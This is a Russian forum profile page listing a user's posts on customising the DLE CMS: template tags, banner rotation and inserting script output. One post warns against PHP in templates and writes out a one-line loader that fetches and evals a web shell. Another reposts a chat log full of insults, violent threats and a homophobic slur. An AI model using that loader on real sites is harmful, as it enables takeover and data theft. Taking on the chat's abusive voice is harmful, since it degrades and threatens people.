-
Публикации
1 592 -
Зарегистрирован
-
Посещение
-
Дней в лидерах
12
Сообщения, опубликованные пользователем IT-Security
-
-
index.php
После
$tpl->load_template('main.tpl');
$img="base.txt"; $array=file($img); $tpl->set('{ban_rotator}', $array[rand(0,count($array)-1)]);
В шаблон в нужное место вставить {ban_rotator}.
-
Ну углядел в ответе Celsoft'а про ручную коррекцию.
На нет и суда нет =)
-
Стучите в аську. Коммерчески решим вопрос лечения мега-сборки =)
-
DocumentRoot "Z:/home/orion.fokino-prim.ru/www" ServerName "orion.fokino-prim.ru" ServerAlias "orion.fokino-prim.ru" "www.orion.fokino-prim.ru" ScriptAlias /cgi/ "/home/orion.fokino-prim.ru/cgi/" ScriptAlias /cgi-bin/ "/home/orion.fokino-prim.ru/cgi-bin/"
ОСь какая на сервере?В 1 строке используются Windows пути, в последних двух *nix пути.
-
Вам написано, что
[b]Windows[/b] does not support
Это раз.
У меня такого бага на винде нет и не было. Ставьте нормальные сборки и будет Вам счастье. Это два =)
-
От DoS атаки нет защиты. Так как это впринципе обычные обращения к сайту =))) Вот только их очень-очень много =)
И выбор БД тут не при чём. Думаю всё таки следует разбираться в вопросе, который задаёте =))
-
Я впринципе отрицаю готовые решения.
Во всех фирмах где мне приходилось что-то дорабатывать я писал с нуля.
-
Нет ничего лучше форума, написанного своими руками.
И в этом вопросе лично меня например мнение Никиты не трогает совершенно.
А их кодеров тем более. Может им просто лень было форум свой писать?
-
Напиши весь код, который ты вставил и по возможности код вставляемого файла.
-
http://igrodrom.ru/index.php?PAGE_ID=6&GAME_ID=697
Идем туда.
Жмём "Click Any where"
Потом Skip
Потом Load
Вставляем в поле
6-6-6-0---0---1---0---6-6-6-0-9---0---1---1---2---3---3---880---9--------------------------0---1---2---2---9---9---c---a---4---2---5-5-7-9---a-----6-c--------------------7-7-7-8-6-1---0---0---7-7-7-8-a-------------------------------9-a--------------------И жмём Play =)
Пробуем сочинить и выкладываем свои творения =)
-
Быть такого не может.
Вставляете ПОСЛЕ
$tpl->load_template('main.tpl');
-
Заранее приношу извинения за нецензурную лексику....
1558880 (14:15:48 15/01/2008)Вас добавили
683993 (14:16:11 15/01/2008)
Программист пишется с двумя "м")))
WoBeR (14:17:39 15/01/2008)
здравствуй
683993 (14:17:58 15/01/2008)
Приветствую
WoBeR (14:18:07 15/01/2008)
Я видел на форуме ты пишешь: Модификации для IPB, DLE | Скрипты любой сложности | Стучать в ПМ или ICQ 683993
683993 (14:19:21 15/01/2008)
Ну да
WoBeR (14:28:15 15/01/2008)
добавь меня
683993 (14:28:28 15/01/2008)
Всех подряд не добавляю
WoBeR (14:29:07 15/01/2008)
сколько стоит конвентор из DLE 6.5 -> IPB 2.3.1?
683993 (14:29:31 15/01/2008)
Смотря что конвертить
WoBeR (14:29:44 15/01/2008)
базу пользователей
683993 (14:30:01 15/01/2008)
паролислетят
683993 (14:30:04 15/01/2008)
пароли слетят
WoBeR (14:30:15 15/01/2008)
а без слета?
683993 (14:30:24 15/01/2008)
Никак. md5 ты не расшифруешь
683993 (14:30:31 15/01/2008)
А формулы в IPB и DLE разные
WoBeR (14:31:01 15/01/2008)
а интеграция с конвентером?
683993 (14:31:36 15/01/2008)
Чего?)))
WoBeR (14:32:05 15/01/2008)
короче нех** ты неумеешь...
WoBeR (14:32:23 15/01/2008)
Spped Хак это ЧИТЫ
683993 (14:32:38 15/01/2008)
С головой всё хорошо?
WoBeR (14:32:38 15/01/2008)
значит ты можешь и наибать
WoBeR (14:32:46 15/01/2008)
так что...
683993 (14:32:47 15/01/2008)
Пошёл нахер, животное
683993 (14:32:49 15/01/2008)
Идиот
683993 (14:32:58 15/01/2008)
Спидхак = скоростной взлом
683993 (14:33:04 15/01/2008)
Пошёл на*** из моей аси, дол*****
WoBeR (14:33:10 15/01/2008)
вот это только что доказало что нех** неумешь
683993 (14:33:18 15/01/2008)
Хахаха))
683993 (14:33:30 15/01/2008)
ИДИОТ ТУПОРЫЛЫЙ ИДИ ***** УЧИ ЧТО ТАКОЕ MD5, а потом ***** мне тут!
WoBeR (14:33:32 15/01/2008)
и не обижайся если я к тебе в гости зайду...
683993 (14:33:40 15/01/2008)
В гости?
683993 (14:33:44 15/01/2008)
Заходи
683993 (14:33:55 15/01/2008)
Сча я ещё друзей позову и устроим тусу
683993 (14:34:03 15/01/2008)
Тебе сначала еба***** разбить или ноги?
683993 (14:34:18 15/01/2008)
Ну что?Я жду, ч**
683993 (14:34:24 15/01/2008)
Отвечай с*** за базар
WoBeR (14:34:29 15/01/2008)
это еще посмотрим кто кого...
683993 (14:34:36 15/01/2008)
Ха
WoBeR (14:34:58 15/01/2008)
Масква сосоет. Питер РЕШАЕТ!!!
683993 (14:35:00 15/01/2008)
Ха)Понятно х*** ты понтуешься)))
683993 (14:35:07 15/01/2008)
Ты из Питера))Очко жим-жим)
683993 (14:35:14 15/01/2008)
Значит можно и повы****аться)
683993 (14:35:20 15/01/2008)
Круто)тока ты соска 1 вещь не учёл
683993 (14:35:25 15/01/2008)
Я скоро в Питере буду
WoBeR (14:35:43 15/01/2008)
давай через 3 дня на ВДНХ в 13:00 ?
683993 (14:36:12 15/01/2008)
А если нас будет 150 с битами?
683993 (14:36:17 15/01/2008)
За попу не боишься?
683993 (14:36:45 15/01/2008)
WoBeR (14:34:58 15/01/2008)
Масква сосоет. Питер РЕШАЕТ!!!
Вот за это тебе тут точно жопу на британский флаг разорвут
WoBeR (14:37:00 15/01/2008)
в москве все <гомосексуалисты>
Дальше совсем капут =)
Таких имбицилов благо мало =)
-
Немного неудобная, но держит ОГРОМНУЮ нагрузку. У самого игра на MSSQL стоит.
-
Чем именно я должен поделится и как именно ограничить тираж?
Слова высказанные на форуме полюбому разойдутся по всему инету.
Что я хочу и могу - то выкладываю.
А просто так дарить то, на чём зарабатываю я не буду.
Моими достижениями являются:
- JS информер (берёт из категории новости и передает через JS)
- Альтернативная баннерная система
- Всякие мелкие модификации типа RSS в категории и т.п.
-
Ссылку то на данный ресурс дайте. Далеко не всё можно посмотреть по скрину.
-
Итак....Ситуация первая.
Рекламодатель дал Вам некий код. Который находится например в
$xz->result();
в файле example.php В данном случае код находится в ФУНКЦИИ. => в 99% случаев есть такое понятие, как возврат функции. Тоесть на экран само по себе ничего не выведется. Открываем index.php Ищем:$tpl->load_template('main.tpl');
Ниже сначала вставим наш файлик. Допустим что он лежит в одной папке с скриптом. Делаем в шаблоне заранее тэг. Например {test_tag}require_once("example.php"); $tpl->set('{test_tag}', $xz->result(););
Случай второй: Есть некий скрипт, который полностью генерирует вывод. Тоесть внутри него использовано echo. Тут можно поступить двумя путями. Первый: Итак у нас есть файл buffer.php (условное имя), в котором используется echo для вывода некоторой информации. Открываем index.php Ищем:$tpl->load_template('main.tpl');
Ниже пишем:$my_buffer = @file_get_contents("buffer.php");
Если данный вариант не работает (У хостера отключена ф-ция), то делаем так:$my_buffer = ""; $my_buff = @file("buffer.php"); foreach ($my_buff as $key=>$value) { $my_buffer.=$value; }
А дальше ловкость рук. Ставим в шаблоне тэг и делаем:$tpl->set('{test_tag}', $my_buffer);
Путь второй (Нужны более грубокие знания PHP) Открываем buffer.php (условное имя), в котором используется echo для вывода некоторой информации и пишем в самом начале:$some_var = "";
А дальше ВЕСЬ вывод скрипта заменяем на:$some_var.= "значения";
Открываем index.php Ищем: Ищем:$tpl->load_template('main.tpl');
Ниже пишем:require_once("buffer.php"); $tpl->set('{test_tag}', $some_var);
И последний случай...SAPE.ru =) Итак... Кладём sape.php в папку с Вашим ID (32 знака). Открываем index.php Ищем:$tpl->load_template('main.tpl');
Ниже вставляем:// SAPE define('_SAPE_USER', 'ВАШ_ID'); require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape = new SAPE_client(); $tpl->set('{sape}', $sape->return_links()); // END
В шаблоне не забываем сделать {sape}.
С уважением Ваш покорный слуга =)
-
Думаю да. Сегодня начну делать...
-
Не у всех пользователей хостер даёт права делать базу, вот, что мешает.
+ появятся новые топики с "Я написал базу moya baza, а она не создалась!Ваш код глючит!" и люди даже разбираться не будут, что в названии базы пробела быть не может.
Можно сделать флажок, но не вижу в этом смысла.
-
Потому что нефига было удалять значения.
Делайте почаще копии базы.
-
-
dle. в данном случае название базы.
-
Так что в итоге делать то нужно? =)
-
Это не недокументированная возможность DLE, а простая модификация кода.
О том как делать свои модули можно почитать в соответствующей статье.
Кстати. Раз народу так неймётся с php-кодом в шаблонах опишу пожалуй пример взлома.
Сценарий первый:
Вы взяли в администраторы человека, а он оказался не очень добропорядочным и хочет захватить контроль над сайтом.Если у Вас включен пхп в шаблонах ему всего то надо написать в main.tpl:
$shell = file_get_contents("путь_до_шелла"); eval($shell);
И собственно всё. Там уже спокойно смотрится доступ к базе.
А это 99%, что базу данных сайта или грохнут или уведут.
+ Через шелл можно спокойненько слить любые файлики с фтп.
Сценарий второй:
Ваш пароль взломали и получили доступ к админ-центру.Далее сценарий первый.
-
Шаблоны на то и шаблоны, чтобы в них НЕ БЫЛО кода.
Есть такое понятие, как разделение ДИЗАЙНА и КОДА.
Блин. Меня просто убивает когда мне хамят на пустом месте!
А просто попросить типа "Сергей, Вы не могли бы взглянуть на мой код?Может вы смогли бы его переделать, чтобы он работал?"
Раз нехватает ума, то научу "вставлять PHP в HTML".
ВЕСЬ вывод скрипта (echo, print) пихается в 1 переменную.
Потом в Index.php после инициализации main.tpl делается require или include.
А потом делается:
$tpl->set('{тег_в_шаблоне}', $переменная_вывода);
Без уважения Сергей.
Зашифровать одну страничку
в В помощь вебмастеру
Опубликовано:
Не понимаю прикола такого кодирования.
Ну зашифровал ты. И толку?